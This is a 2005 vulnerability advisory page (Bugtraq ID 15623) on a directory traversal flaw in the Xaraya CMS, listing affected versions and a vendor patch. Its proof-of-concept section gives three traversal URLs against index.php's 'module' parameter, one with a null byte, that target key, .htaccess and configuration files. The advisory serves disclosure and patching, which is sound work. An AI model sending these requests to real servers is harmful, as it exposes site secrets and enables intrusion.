Xaraya Directory Traversal Vulnerability
BID:15623
Info
Xaraya Directory Traversal Vulnerability
| Bugtraq ID: | 15623 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 29 2005 12:00AM |
| Updated: | Nov 29 2005 12:00AM |
| Credit: | Discovered by rgod <[email protected]>. |
| Vulnerable: |
Xaraya Xaraya 1.0 RC4 Xaraya Xaraya 1.0 RC3 Xaraya Xaraya 1.0 RC2 Xaraya Xaraya 1.0 RC1 Xaraya Xaraya 1.0 |
| Not Vulnerable: | |
Discussion
Xaraya Directory Traversal Vulnerability
Xaraya is prone to a directory traversal vulnerability.
Reports indicate that an attacker can supply directory traversal sequences through the 'module' parameter of the 'index.php' script to place files in arbitrary locations on a Web server.
If an attacker places malicious script files on a Web server and is able to execute them, this issue could facilitate a remote compromise. Other attacks including data corruption and denial of service are also possible.
Xaraya 1.0.0 RC4 and prior versions are affected.
Xaraya is prone to a directory traversal vulnerability.
Reports indicate that an attacker can supply directory traversal sequences through the 'module' parameter of the 'index.php' script to place files in arbitrary locations on a Web server.
If an attacker places malicious script files on a Web server and is able to execute them, this issue could facilitate a remote compromise. Other attacks including data corruption and denial of service are also possible.
Xaraya 1.0.0 RC4 and prior versions are affected.
Exploit / POC
Xaraya Directory Traversal Vulnerability
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../.key.php
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../../.htaccess
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../config.system.php%00
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../.key.php
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../../.htaccess
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../config.system.php%00
Solution / Fix
Xaraya Directory Traversal Vulnerability
Solution:
The vendor has released a patch to address this issue.
Xaraya Xaraya 1.0
Xaraya Xaraya 1.0 RC2
Xaraya Xaraya 1.0 RC4
Xaraya Xaraya 1.0 RC1
Xaraya Xaraya 1.0 RC3
Solution:
The vendor has released a patch to address this issue.
Xaraya Xaraya 1.0
-
Xaraya xarsecurity051130.zip
http://www.xaraya.com/downloads/patches/xarsecurity051130.zip
Xaraya Xaraya 1.0 RC2
-
Xaraya xarsecurity051130.zip
http://www.xaraya.com/downloads/patches/xarsecurity051130.zip
Xaraya Xaraya 1.0 RC4
-
Xaraya xarsecurity051130.zip
http://www.xaraya.com/downloads/patches/xarsecurity051130.zip
Xaraya Xaraya 1.0 RC1
-
Xaraya xarsecurity051130.zip
http://www.xaraya.com/downloads/patches/xarsecurity051130.zip
Xaraya Xaraya 1.0 RC3
-
Xaraya xarsecurity051130.zip
http://www.xaraya.com/downloads/patches/xarsecurity051130.zip
References
Xaraya Directory Traversal Vulnerability
References:
References: